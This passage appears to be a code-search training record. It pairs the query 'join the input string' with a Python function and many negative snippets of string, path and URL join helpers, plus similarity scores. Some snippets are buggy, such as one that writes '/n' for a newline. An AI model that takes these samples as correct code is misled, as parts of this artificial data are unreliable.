"0.49480367",
"0.4940397",
"0.493007",
"0.4917736",
"0.49088886",
"0.4890636",
"0.48739162",
"0.4867709",
"0.4861594",
"0.48556358",
"0.4849366",
"0.48490348",
"0.48423594",
"0.48384184",
"0.48313564",
"0.48265526",
"0.48254472",
"0.4822892",
"0.4809546",
"0.4808165",
"0.48000398",
"0.47978896",
"0.47975978",
"0.47915488",
"0.47674677",
"0.47535634",
"0.47476095",
"0.47443464",
"0.4732304",
"0.47172344",
"0.47172084",
"0.4706235",
"0.46897304",
"0.46748835",
"0.46580702",
"0.4656013",
"0.46523625",
"0.46487445",
"0.46460047",
"0.46415251",
"0.46415251",
"0.46406233",
"0.46358407",
"0.4633533",
"0.46328533",
"0.46235913",
"0.4622502",
"0.458832"
] | 0.75627106 | 3 |
join the input string | def my_join(iters, string):
out = ""
for i in range(iters):
out += "," + string
return out | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def join(self, iterable) -> String:\n pass",
"def my_join(iters, string):\n out = ''\n for i in range(iters):\n out += \", \" + string\n return out",
"def join_strings(words):\n joined_string = ''\n for word in words:\n joined_string += word\n\n return joined_string",
"def my_join(iters, string):\n out = ''\n for i in range(iters):\n out += string.join(\", \")\n return out",
"def my_join(iters, string):\n out=''\n for i in range(iters):\n out += string.join(\", \")\n #add string together with , as seperator\n #repeat iters numbers of times\n return out",
"def robust_join(s, sep=','):\n return sep.join([str(e) for e in s])",
"def join(sep, xs):\n return str(sep).join(xs)",
"def join(self, tokens):\n if self.chars:\n joiner = ''\n else:\n joiner = ' '\n return joiner.join(tokens)",
"def _urljoin(self, *args):\r\n\t\treturn \"/\".join(map(lambda x: str(x).rstrip('/'), args))",
"def join_string(part1, part2, concatenation_string = 'AND', seperator=' '):\n\n if part1 == '':\n return part2\n\n elif part2 == '':\n return part1\n\n\n if part1[-1] == seperator:\n sep1 = ''\n else:\n sep1 = seperator\n\n\n if part2[0] == seperator:\n sep2 = ''\n else:\n sep2 = ' '\n\n\n return part1 + sep1 + concatenation_string + sep2 + part2",
"def ujoin(*args):\n if len(args) == 0 or len(args[0]) == 0:\n return ''\n return (\n (args[0][0] == '/') * '/' # prepend slash if first arg starts with it\n + '/'.join(x[(x[0] == '/') : (len(x) - (x[-1] == '/'))] for x in args)\n + (args[-1][-1] == '/') * '/'\n ) # append slash if last arg ends with it",
"def word_join(self, words):\n return \" \".join(words)",
"def urljoin(*args):\n\n return \"/\".join(map(lambda x: str(x).rstrip('/'), args))",
"def list_join(the_list):\n return ' '.join(the_list)",
"def rejoin(textList):\n return ','.join(textList)",
"def sentence_join(self, sentences):\n return \" \".join(sentences)",
"def join_link(s, separator):\n if s == empty:\n return \"\"\n elif rest(s) == empty:\n return str(first(s))\n else:\n return str(first(s)) + separator + join_link(rest(s), separator)\n # so much like the TLS programming style.",
"def urljoin(*args):\n return '/'.join(str(a or '').strip('/') for a in args)",
"def join(self, delimiter: str) -> str:\n return delimiter.join((str(x) for x in self.array))",
"def list_string(join_list):\n joined_list = '[{}]'.format(join_list, join_list)\n return joined_list",
"def join(sep, seq):\n return _to_bytes_or_str_array(\n _vec_string(sep, object_, 'join', (seq,)), seq)",
"def join_list(items: Iterable[str]) -> str:\n\n return ITEM_SEPARATOR.join(items)",
"def join(self, *parts):\n if parts:\n parts = list(parts)\n if len(parts) > 1:\n for i, p in enumerate(parts[:-1]):\n parts[i] = p.strip('/')\n parts[-1] = parts[-1].lstrip('/')\n return '/'.join(parts)",
"def jointext(firststring, secondstring):\n\n # Return the joined strings\n return str(firststring) + str(secondstring)",
"def join_link(s, separator):\n if s == empty:\n return\"\"\n elif rest(s) == empty:\n return str(first(s))\n else:\n return str(first(s)) + separator + join_link(rest(s), separator)",
"def join_link(s, separator):\n if s == empty:\n return \"\"\n elif rest(s) == empty:\n return str(first(s))\n else:\n return str(first(s)) + separator + join_link(rest(s), separator)",
"def join_link(s, separator):\n if s == empty:\n return ''\n elif rest(s) == empty:\n return str(first(s))\n else:\n return str(first(s)) + separator + join_link(rest(s), separator)",
"def join_strings_with_comma(words):\n joined_string = ', '.join(words)\n return joined_string",
"def join(self, iterable):\n result = ANSIString(\"\")\n last_item = None\n for item in iterable:\n if last_item is not None:\n result += self._raw_string\n if not isinstance(item, ANSIString):\n item = ANSIString(item)\n result += item\n last_item = item\n return result",
"def join_strings(self):\n\n self.__corpora = [' ' + ' '.join(strings) + ' ' for strings in self.__corpora]",
"def str_join(paths: []):\n return \"/\".join(paths)",
"def Join(sourcearray, delimeter=\" \"):\n s_list = list(map(str, sourcearray))\n return delimeter.join(s_list)",
"def join(self, sep):\n if self.is_a(str):\n return _(self._.join(sep))\n return _(sep.join(self._))",
"def join(*args, **kwargs):\n if args:\n print ', '.join([str(s) for s in args])\n if kwargs:\n sub_items = []\n for k, v in kwargs.items():\n sub_items.append(''.join([k, '=', v]))\n print ', '.join(sub_items)",
"def join(self):\n return \"\".join(self._digits)",
"def concat_text(text):\n textout = \" \".join(text)\n return textout",
"def _url_join(self, *parts):\n return \"/\".join(map(lambda fragment: fragment.rstrip('/'), parts))",
"def query_join(*query_list):\n return \"&\".join(query_list)",
"def concat_strings(l_strings):\n if l_strings == []:\n return \"\"\n else: \n return l_strings[0] + \" \" + concat_strings(l_strings[1:])",
"def implode(delim, items):\n return delim.join(items)",
"def join_url(*args): # type: (*str) -> str\n parts = [part[:-1] if part and part[-1] == '/' else part for part in args]\n parts.append('')\n return '/'.join(parts)",
"def join(*paths):\r\n path = \"\"\r\n for component in paths:\r\n path += (\"/\" if path and not path.endswith(\"/\") else \"\") + component.replace(\r\n \"\\\\\", \"/\"\r\n )\r\n return path",
"def _commandline_join(self, tokens):\r\n commands = filter(None, map(str, tokens))\r\n return self._command_delimiter.join(commands).strip()",
"def _commandline_join(self, tokens):\r\n commands = filter(None, map(str, tokens))\r\n return self._command_delimiter.join(commands).strip()",
"def _commandline_join(self, tokens):\r\n commands = filter(None, map(str, tokens))\r\n return self._command_delimiter.join(commands).strip()",
"def and_join(sequence):\n return ', '.join(sequence[:-1]) + ',' * (len(sequence) > 2) + ' and ' * (len(sequence) > 1) + sequence[-1]",
"def join(path, *paths: str) -> str:\n pass",
"def join_str_list(str_list):\n result = \"\"\n for s in str_list:\n if s.startswith(\"##\"):\n result += s[2:]\n else:\n result += \" \" + s\n return result",
"def concatenate_string(string1, stringy2):\n return string1 + \" \" + stringy2",
"def urljoin(*args):\n from six.moves.urllib.parse import urljoin as sys_urljoin\n from functools import reduce\n return reduce(sys_urljoin, args)",
"def list_to_string(inputlist):\n outstring = \"\"\n numusers = len(inputlist)\n if numusers == 1: # foo\n outstring += inputlist[0]\n if numusers == 2: # foo and bar\n outstring += (inputlist[0] + \" and \" + inputlist[1])\n if numusers >= 3: # foo, bar and baz\n for x in range(numusers-2):\n outstring += inputlist[x] + \", \"\n outstring += (inputlist[-2] + \" and \" + inputlist[-1])\n return outstring",
"def list_to_str(input_str):\r\n\r\n return \" \".join([str(val) for val in input_str])",
"def join_params(**params):\n\tparam_list = get_sorted_keys(params)\n\tvalues = []\n\tfor k in param_list:\n\t\tvalues.append(k+'-'+join_items(params[k]))\n\treturn \"_\".join(values)",
"def join_str(lst, new_line=False):\n if new_line:\n j_str = \"/n\".join([str(i) for i in lst])\n else:\n j_str = \"\".join([str(i) for i in lst])\n return j_str",
"def url_path_join(*fragments):\n fragments = fragments or (\"\",)\n result = fragments[0] # Tolerate an empty list\n for thing in fragments[1:]:\n result = result.rstrip(\"/\") + \"/\" + thing.lstrip(\"/\")\n return result",
"def __joinCmdStringWithExtras (self,cmdString,extras):\n if (extras != \"\"):\n self._log(\"joining-extras\").debug4(\"joining cmd '%s' with extra params '%s'\",cmdString,extras)\n cmdString += \" \" + extras\n return cmdString",
"def url_join(*parts):\n parts = parts or [\"\"]\n clean_parts = [part.strip(\"/\") for part in parts if part]\n if not parts[-1]:\n # Empty last element should add a trailing slash\n clean_parts.append(\"\")\n return \"/\".join(clean_parts)",
"def join_with_and(values, last_word: str = 'and') -> str:\n valuesList = list(values)\n length = len(valuesList)\n\n # value1, value2, value3 and value4\n if length > 2:\n return '{} {} {}'.format(', '.join(valuesList[:-1]), last_word, valuesList[-1])\n # value1 and value2\n elif length == 2:\n return '{} {} {}'.format(valuesList[0], last_word, valuesList[1])\n # value 1\n elif length == 1:\n return valuesList[0]\n # Empty\n return ''",
"def joined_parameter(*values: str) -> str:\n return \"+\".join(values)",
"def join(path, *paths):\n\n for p in paths:\n if p.startswith(\"/\"):\n path = p\n elif p != \"\":\n path += (\"\" if path == \"\" or path.endswith(\"/\") else \"/\") + p\n return path",
"def underscore_join(iterable):\n iterable_as_str = [str(x) for x in iterable]\n return \"__\".join(iterable_as_str)",
"def concat_with_separator(strings, starting_separator):\n s=[]\n for i in range(len(strings)):\n s+=strings[i]+[starting_separator+i]\n return s",
"def join_items(values, sort=False):\n\tif isinstance(values, str):\n\t\treturn clean_string(values)\n\n\ttry:\n\t\tval = []\n\t\tfor v in values:\n\t\t\tval.append(clean_string(v))\n\t\tif sort:\n\t\t\tval.sort()\n\t\treturn \"-\".join(val)\n\texcept TypeError:\n\t\treturn str(values)",
"def concatenate_string(stringy1, stringy2):\n\n return \"{} {}\".format(stringy1, stringy2)",
"def concat(*args, sep=\"/\"):\n return sep.join(args)",
"def concatena(*args):\n linea = ''\n for l in args:\n linea += str(l if l else '')\n return linea",
"def encode(self, strs):\n even = 0\n odd = 1\n rst = ''\n while even<len(strs) and odd<len(strs):\n rst += strs[odd]\n rst += ','\n rst += strs[even]\n odd += 2\n even +=2\n if even<len(strs):rst+=strs[even]\n elif odd<len(strs): rst+=strs[odd]\n return rst",
"def urljoin(*atoms):\n url = \"/\".join([x for x in atoms if x])\n while \"//\" in url:\n url = url.replace(\"//\", \"/\")\n # Special-case the final url of \"\", and return \"/\" instead.\n return url or \"/\"",
"def join_with_or(values) -> str:\n return join_with_and(values, 'or')",
"def shlex_join(split_command) -> str:\n return \" \".join(shlex.quote(str(arg)) for arg in split_command)",
"def __join_if_list(text_or_list: Union[List[str], str]) -> str:\n\n if isinstance(text_or_list, list):\n return ' '.join(text_or_list)\n return text_or_list",
"def merge(string: str, user_input: tuple) -> str:\n merged_string = string.format(*user_input)\n return merged_string",
"def join_list(jlist, joiner=', '):\n if len(jlist) == 0:\n jlist = '[]'\n else:\n jlist = joiner.join(jlist)\n return jlist",
"def testJoin(self):\r\n P=lambda p:ufsi.NativeUnixPath(p)\r\n data={\r\n # 1\r\n 'relativePath':\r\n ['/dir1/',P('dir2/fileBase.ext'),'/dir1/dir2/fileBase.ext'],\r\n\r\n # 2\r\n 'absolutePath':\r\n ['/dir1/',P('/dir2/fileBase.ext'),'/dir2/fileBase.ext'],\r\n\r\n # 3\r\n 'notSeparatorTerminatedPath':\r\n ['dir1',P('dir2/fileBase.ext'),'dir1/dir2/fileBase.ext'],\r\n\r\n # 4\r\n 'emptyPath':\r\n ['dir1',P(''),'dir1/'],\r\n\r\n # 5\r\n 'nonNativePath':\r\n ['dir1',ufsi.HttpPath('http://www.google.com.au/'),\r\n 'http://www.google.com.au/']\r\n }\r\n\r\n for k in data.iterkeys():\r\n p1=P(data[k][0])\r\n p2=data[k][1]\r\n r1=str(p1.join(p2))\r\n r2=data[k][2]\r\n self.assertEquals(r1,r2,\r\n '%s: join result was %r but should have been %r'\r\n %(k,r1,r2))",
"def urljoin(*parts):\n def _gen(parts):\n prev = None\n for part in parts:\n if not part:\n continue\n if not prev:\n prev = part\n elif (prev[-1] == '/') != (part[0] == '/'): # Exactly one slash was present\n prev = part\n # At this point, either zero or two slashes are present. Which is it?\n elif part[0] == '/': # Two slashes.\n prev = part[1:]\n else: # No slashes.\n yield '/'\n prev = part\n yield prev\n\n return \"\".join(part for part in _gen(parts))",
"def concatenate_items(items, conjunction='and'):\n text = ''\n if not items:\n text = ''\n elif len(items) == 1:\n text = items[0]\n elif len(items) == 2:\n text = '{} {} {}'.format(items[0], conjunction, items[1])\n else:\n text = ', '.join(items[:-1])\n text += ', {} {}'.format(conjunction, items[-1])\n return text",
"def stringer(list):\n\tstring = \"\"\n\tfor x in list:\n\t\tstring = string + str(x)\n\treturn string",
"def urljoin(cls, base, end):\n\n if base and not base.endswith('/'):\n base = base + '/'\n return urljoin(base, str(end))",
"def shlex_join(argv):\n def quote(arg):\n if arg.find(\" \") >= 0:\n return '\"%s\"' % arg\n else:\n return arg\n return \" \".join([quote(arg) for arg in argv])",
"def str(self) -> str:\n return \"\".join(self)",
"def join_list(\n object_list: list, delimiter: str = \", \", last_delimiter: str = \" & \"\n) -> str:\n if not object_list:\n return \"\"\n list_copy = list(object_list)\n last = list_copy.pop()\n if list_copy:\n return f\"{delimiter.join(list_copy)}{last_delimiter}{last}\"\n return f\"{last}\"",
"def join(self, texts, joiner=', '):\n\n return joiner.join((\n text for index, text in enumerate(texts)\n if text and text not in texts[index + 1:]\n ))",
"def urljoin(cls, base, end):\r\n if base and not base.endswith(\"/\"):\r\n base = base + \"/\"\r\n return urljoin(base, str(end))",
"def route_join(*args):\n route_url = \"/\".join([x.strip(\"/\") for x in args])\n if not route_url.startswith(\"/\"):\n route_url = \"/\" + route_url\n return route_url",
"def _join(lst, key, sep=\";\"):\n return sep.join([d[key] for d in lst if d[key]])",
"def implode(self, column, glue=''):\n return glue.join(self.lists(column))",
"def normalized_join(path1: str, *pathsN) -> str:\n return normalized_path(os.path.join(path1, *pathsN))",
"def join_date_strings(dates, separator=\"','\", df=\"%d-%m-%Y\"):\n return separator.join([x.strftime(df) for x in dates])",
"def str_cat(arg1, arg2):\n return str(arg1) + str(arg2)",
"def irchain_str(self):\n s = []\n if self.irlen_before:\n s.append('%d' % self.irlen_before)\n s.append('(%d)' % self.irlen)\n if self.irlen_after:\n s.append('%d' % self.irlen_after)\n return ','.join(s)",
"def path_join(first: str, second: str) -> str:\n first = first.rstrip('/\\\\')\n second = second.lstrip('/\\\\')\n if not first: return second\n if not second: return first\n return first + '/' + second",
"def _concat(self, *args, **kwargs):\n values = list(args)\n output = []\n for value in values:\n if not isinstance(value, (str, basestring)):\n value = unicode(value)\n else:\n value = unicode(value)\n value = value.strip()\n output.append(value)\n output = kwargs[\"delimiter\"].join(output)\n output = unicode(output)\n return output",
"def urljoin(base, *path, **query):\n if base and base.endswith('/'):\n base = base[:-1]\n retval = [base]\n\n # build the path\n path = '/'.join([''] + [quote(s, '') for s in path])\n if path:\n retval.append(path)\n\n # build the query string\n params = []\n for name, value in query.items():\n if type(value) in (list, tuple):\n params.extend([(name, i) for i in value if i is not None])\n elif value is not None:\n if value is True:\n value = 'true'\n elif value is False:\n value = 'false'\n params.append((name, value))\n if params:\n retval.extend(['?', urlencode(params)])\n\n return ''.join(retval)",
"def collapse(L):\n output = \"\"\n for s in L:\n output = output + s\n return output",
"def collapse(L):\n output = \"\"\n for s in L:\n output = output + s\n return output",
"def collapse(L):\n output = \"\"\n for s in L:\n output = output + s\n return output",
"def collapse(L):\n output = \"\"\n for s in L:\n output = output + s\n return output",
"def join(cls, *args):\n return AbsolutePath(os.path.join(*(str(piece) for piece in args)))",
"def join_path(values: t.List[str]) -> str:\n from axonius_api_client.tools import listify\n\n return \" => \".join(listify(values))",
"def concat_list(str_lst):\n concatenation = ''\n if len(str_lst) != 0:\n for string in str_lst:\n concatenation = concatenation + string\n return concatenation"
] | [
"0.73991024",
"0.732438",
"0.7231096",
"0.72088933",
"0.7069224",
"0.6920054",
"0.68781954",
"0.67399055",
"0.66996497",
"0.6629545",
"0.6618605",
"0.65867525",
"0.658431",
"0.6571246",
"0.653331",
"0.65244675",
"0.6523184",
"0.6489013",
"0.6483073",
"0.6398085",
"0.6364346",
"0.63627094",
"0.6359249",
"0.63512945",
"0.6350764",
"0.63500947",
"0.63371634",
"0.6315935",
"0.62794495",
"0.6273673",
"0.6269532",
"0.62361354",
"0.61873597",
"0.6146656",
"0.61364436",
"0.60992634",
"0.60929066",
"0.60897845",
"0.60533345",
"0.60423857",
"0.60247684",
"0.6020866",
"0.60157007",
"0.60157007",
"0.60157007",
"0.5999405",
"0.599927",
"0.5947259",
"0.59366506",
"0.5931084",
"0.59193313",
"0.5919187",
"0.5903051",
"0.5888612",
"0.5888465",
"0.5862411",
"0.58587533",
"0.58576983",
"0.58576524",
"0.5795488",
"0.5780179",
"0.5766938",
"0.5759968",
"0.5759488",
"0.5740611",
"0.572998",
"0.5723133",
"0.5720879",
"0.5716602",
"0.5698202",
"0.569399",
"0.56917727",
"0.56766355",
"0.56683147",
"0.56661326",
"0.56522155",
"0.56516755",
"0.56284744",
"0.56201625",
"0.56036997",
"0.5598421",
"0.55806017",
"0.5574956",
"0.5562334",
"0.55589324",
"0.555222",
"0.5552216",
"0.5517076",
"0.55086505",
"0.5498616",
"0.548909",
"0.5482196",
"0.547685",
"0.5452624",
"0.5452624",
"0.5452624",
"0.5452624",
"0.5448535",
"0.54418135",
"0.54411495"
] | 0.73344773 | 1 |